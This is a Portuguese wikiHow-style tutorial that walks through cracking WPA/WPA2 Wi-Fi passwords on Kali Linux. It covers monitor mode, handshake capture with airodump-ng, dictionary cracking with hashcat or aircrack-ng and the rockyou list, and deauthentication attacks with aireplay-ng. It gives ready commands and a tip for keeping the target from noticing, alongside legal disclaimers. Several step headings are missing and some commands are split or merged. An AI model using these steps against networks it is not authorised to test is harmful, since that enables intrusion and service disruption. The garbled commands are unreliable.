PDF download Baixe em PDF PDF download Baixe em PDF

Este artigo vai ensiná-lo a hackear a senha de uma rede WPA ou WPA2 com o Kali Linux.

Parte 1
Parte 1 de 4:

Preparando-se para o hacker o Wi-Fi

PDF download Baixe em PDF
  1. Na maioria das regiões, o único motivo razoável para se descobrir a senha de uma rede WPA ou WPA2 é quando ela pertence a você mesmo ou a uma pessoa que o autorizou explicitamente.
    • Hackear uma senha em ocasiões diferentes das listadas acima é ilegal, e pode ser considerado crime.
  2. Essa é uma ferramenta ideal para hacker redes WPA e WPA2. Para baixar a imagem de instalação (ISO) do Kali Linux, faça o seguinte:
    • Acesse https://www.kali.org/downloads em um navegador de internet no computador.
    • Clique em HTTP ao lado da versão do Kali que você quer usar.
    • Aguarde até que o arquivo seja baixado.
  3. Torne o pendrive inicializável . Fazê-lo permite que você o utilize como local de instalação.
  4. Para tanto, abra a janela do pendrive e arraste o arquivo para dentro dela.
    • Mantenha o pendrive conectado até o final desse processo.
  5. Para tanto, faça o seguinte:
    • Reinicie o computador.
    • Acesse o menu da BIOS .
    • Defina o computador para inicializar usando o pendrive acessando o menu "Opções de inicialização" (ou algo parecido), selecionando o pendrive e movendo-o para o topo da lista.
    • Salve e saia da BIOS, depois aguarde até que a janela de instalação do Kali Linux apareça (pode ser necessário reiniciar o computador mais uma vez).
    • Siga as instruções na tela para instalar o Kali Linux.
  6. Você pode comprá-la na internet ou em uma lógica de dispositivos eletrônicos. Essa placa precisa ter suporte a monitoramento (RFMON), ou então não será possível hacker a rede.
    • Muitos computadores já possuem uma placa de rede Wi-Fi com suporte a RFMON, então tente usar a sua seguindo os próximos passos antes de comprar uma nova.
    • Se estiver usando o Kali Linux em uma máquina virtual, será preciso uma placa de rede Wi-Fi nova independentemente da que estiver já instalada no seu computador.
  7. Insira seu nome de usuário e senha quando solicitado.
    • É preciso usar uma conta root durante todo o processo de descoberta de senha.
  8. Ao fazê-lo, ela será imediatamente reconhecida e seus drives serão baixados e instalados sozinhos; caso solicitado, siga as instruções na tela para completar a configuração. Ao final desse passo, você poderá avançar com o processo de descobrir a senha da rede selecionada.
    • Caso já tenha configurado a placa de rede antes no computador, ainda assim será preciso ajustá-la Kali Linux plugando-a.
    • Na maioria dos casos, plugá-la no computador é o suficiente para configurá-la.
    Publicidade
Parte 2
Parte 2 de 4:

Hackenado a rede Wi-Fi

PDF download Baixe em PDF
  1. Ele tem o ícone de uma caixa preta com o os caracteres ">_" na cor branca dentro.
    • Você também pode abrir o Terminal pressionando as teclas Alt + Ctrl + T .
  2. Digite o seguinte comando e pressione a tecla Enter :
    sudo apt-get install aircrack-ng
  3. Informe a senha usada para acessar o computador e pressione a tecla Enter . Em seguida, você obterá acesso root para qualquer comando executado no Terminal.
    • Ao abrir outra janela do Terminal (conforme necessário mais tarde), pode ser preciso usar o comando com o prefixo sudo e/ou sua senha novamente.
  4. Pressione a tecla Y quando solicitado, e depois aguarde pela instalação do programa.
  5. Para tanto, digite o seguinte comando e pressione a tecla Enter :
    airmon-ng
  6. Você pode encontrá-lo na coluna "Interface".
    • Se estiver hackeando sua própria rede, geralmente o nome será "wlan0".
    • Caso não veja o nome de um monitor, então sua placa Wi-Fi não tem suporte a monitoramento.
  7. Faça-o digitando o seguinte comando e pressionando a tecla Enter :
    airmon-ng start wlan0
    • Substitua "wlan0" pelo nome da rede alvo caso ele seja diferente.
  8. Para fazê-lo, execute o comando abaixo:
    iwconfig
  9. Em alguns casos, a placa de Wi-Fi conflita com alguns serviços em execução no computador. Você pode encerrar esses processos por meio do comando a seguir: [1]
    airmon-ng check kill 
    
  10. Na maioria dos casos, o nome é algo como "mon0" ou "wlan0mon". [2]
  11. Para obter uma lista de todos os roteadores dentro do seu alcance, execute o seguinte comando:
    airodump-ng mon0
    • Substitua "mon0" pelo nome da interface do monitor obtido no último passo.
  12. Ao final de cada linha de texto, você verá um nome; encontre aquele que pertence à rede cuja senha você quer obter.
  13. Caso veja "WPA" ou "WPA2" imediatamente à esquerda do nome da rede, então você poderá seguir; caso contrário, não será possível hackear a rede.
  14. Essas informações estão à esquerda do nome da rede:
    • MAC address (Endereço Mac) : essa é a linha de números no extremo esquerdo da linha do roteador.
    • Channel (Canal) : esse é o número (como 0, 1, 2, etc.) diretamente à esquerda da tag WPA ou WPA2.
  15. Um "aperto de mão" ocorre quando um item é conectado a uma rede (por exemplo: um computador se conecta a um roteador). Digite o seguinte comando, substituindo os componentes necessários pelas informações da sua rede:
    airodump-ng -c channel --bssid MAC -w /root/Desktop/ mon0
    • Substitua "channel" pelo número do canal obtido no último passo.
    • Substitua "MAC" pelo endereço Mac obtido no último passo.
    • Lembre-se de substitui "mon0" pelo nome da sua interface.
    • Veja um exemplo de endereço:
      airodump-ng -c 3 
      --bssid 1C:1C:1E:C1:AB:C1 -w /root/Desktop/ wlan0mon
  16. Depois de ver a linha com a tag "WPA handshake:" seguido do endereço Mac no canto superior direito da tela, continue.
  17. Pressione as teclas Ctrl + C para sair; em seguida, veja se há um arquivo ".cap" na sua área de trabalho.
  18. Embora não seja estritamente necessário, fazê-lo facilita as coisas mais tarde. Execute o seguinte comando para alterar o nome, substituindo "name" pelo nome que você quer dar ao arquivo:
    mv ./-01.cap name.cap
    • Se o arquivo ".cap" não tiver o nome "-01.cap", substitua "-01.cap" pelo nome do seu arquivo ".cap".
  19. Para tanto, use o conversor do Kali Linux. Digite o seguinte comando, substituindo "name" pelo nome do seu arquivo:
    cap2hccapx.bin name.cap name.hccapx
    • Você também pode acessar https://hashcat.net/cap2hccapx/ e enviar o arquivo ".cap" ao conversor clicando em Choose File (Escolher arquivo) e selecionando-o. Ao final do envio, clique em Convert (Converter) para convertê-lo, depois baixe-o de volta à área de trabalho antes de continuar.
  20. Esse é o serviço usado para descobrir a senha da rede. Digite os seguintes comandos, em ordem:
    sudo git clone https://github.com/brannondorsey/naive-hashcat cd 
    naive-hashcat
    curl -L -o dicts/rockyou.txt https://github.com/brannondorsey/naive-hashcat/releases/download/data/rockyou.txt
    • Caso seu computador não tenha uma GPU ( Graphics Processing Unit - Unidade de processamento visual), será preciso usar oaircrack-ng então.
  21. Ao final da instalação, execute o seguinte comando (substituindo qualquer instância de "name" pelo nome do arquivo ".cap"):
     HASH_FILE 
     = 
    name.hccapx POT_FILE 
     = 
    name.pot HASH_TYPE 
     = 
     2500 
    ./naive-hashcat.sh
  22. Quando isso ocorre, ela é adicionada no arquivo "name.pot" encontrado na pasta "naive-hashcat"; a palavra ou frase depois do último sinal de dois pontos é a senha.
    • Pode ser preciso desde algumas horas até meses para que uma senha seja hackeada.
    Publicidade
Parte 3
Parte 3 de 4:

Usando o Aircrack-Ng em computadores sem GPU

PDF download Baixe em PDF
  1. O mais usado dele é o "Rock You". Você pode baixá-lo por meio do comando abaixo:
    curl -L -o rockyou.txt https://github.com/brannondorsey/naive-hashcat/releases/download/data/rockyou.txt
    • Saiba que o aircrack-ng não é capaz de hackear a senha do WPA ou WPA2 caso ela não esteja na lista de palavras.
  2. Para tanto, insira o comando abaixo, usando as informações de rede corretas:
    aircrack-ng -a2 -b MAC -w rockyou.txt name.cap
    • Se estiver hackeando uma rede WPA em vez de WPA2, substitua "-a2" por -a .
    • Substitua "MAC" pelo endereço Mac obtido na última seção.
    • Substitua "name" pelo nome do arquivo ".cap".
  3. Caso veja o cabeçalho "KEY FOUND!" (Senha encontrada!), então o aircrack-ng descobriu a senha. Ela será exibida entre colchetes à direita do cabeçalho "KEY FOUND!".
    Publicidade
Parte 4
Parte 4 de 4:

Usando ataques de desautenticação para forçar um aperto de mão

PDF download Baixe em PDF
  1. 1
    Entenda o que um ataque de desautenticação. Esse tipo de ataque envia um pacote de desautenticação ao roteador que você quer hackear, fazendo com que a internet seja desconectada e pedindo que o usuário faça login novamente. Depois que o login é feito, o aperto de mão será realizado.
  2. Para tanto, execute o seguinte comando, inserindo as informações da rede quando necessário:
    airodump-ng -c channel --bssid MAC
    • Por exemplo:
      airodump-ng -c 1 
      --bssid 9C:5C:8E:C9:AB:C0
  3. Depois que os endereços Mac aparecerem um ao lado do outro (como uma linha de texto contendo o nome do fabricante), você poderá continuar.
    • Isso indica que um cliente (como um computador por exemplo) foi conectado à rede.
  4. Você também pode abri-lo pressionando as teclas Alt + Ctrl + T . Verifique se o airodump-ng ainda está em execução em segundo plano na janela do Terminal.
  5. Para tanto, execute o seguinte comando, inserindo as informações da rede quando necessário: [3]
    aireplay-ng -0 2 
    -a MAC1 -c MAC2 mon0
    • O "2" equivale ao número de pacotes enviados. Você pode aumentá-lo, mas saiba que enviar uma quantidade maior pode causar uma falha de segurança perceptível.
    • Substitua "MAC1" pelo endereço Mac da esquerda na parte inferior da janela de fundo do Terminal.
    • Substitua "MAC2" pelo endereço Mac da direita na parte inferior da janela de fundo do Terminal.
    • Lembre-se de substituir "mon0" pelo nome da interface encontrada ao procurar roteadores.
    • Veja um exemplo do comando:
      aireplay-ng -0 3 
      -a 9C:5C:8E:C9:AB:C0 -c 64 
      :BC:0C:48:97:F7 mon0
  6. Volte à janela do Terminal em segundo plano depois de enviar os pacotes de desautenticação.
  7. Depois de ver a tag "WPA handshake:" e o endereço ao lado dela, avance para o passo de hackear a rede .
    Publicidade

Dicas

  • Usar esse método para testar a vulnerabilidade da sua própria rede antes de iniciar um servidor é uma boa forma de preparar seu sistema para ataques semelhantes.
Publicidade

Avisos

  • Enviar mais do que dois pacotes de desautenticação pode causar falha no computador alvo, gerando algum tipo de suspeita.
  • Hackear a rede Wi-Fi de uma pessoa sem permissão é ilegal na maioria dos países. Execute os passos deste artigo apenas em sua própria rede ou caso tenha sido autorizado pelo usuário dela.
Publicidade

Sobre este guia wikiHow

Esta página foi acessada 193 480 vezes.

Este artigo foi útil?

Publicidade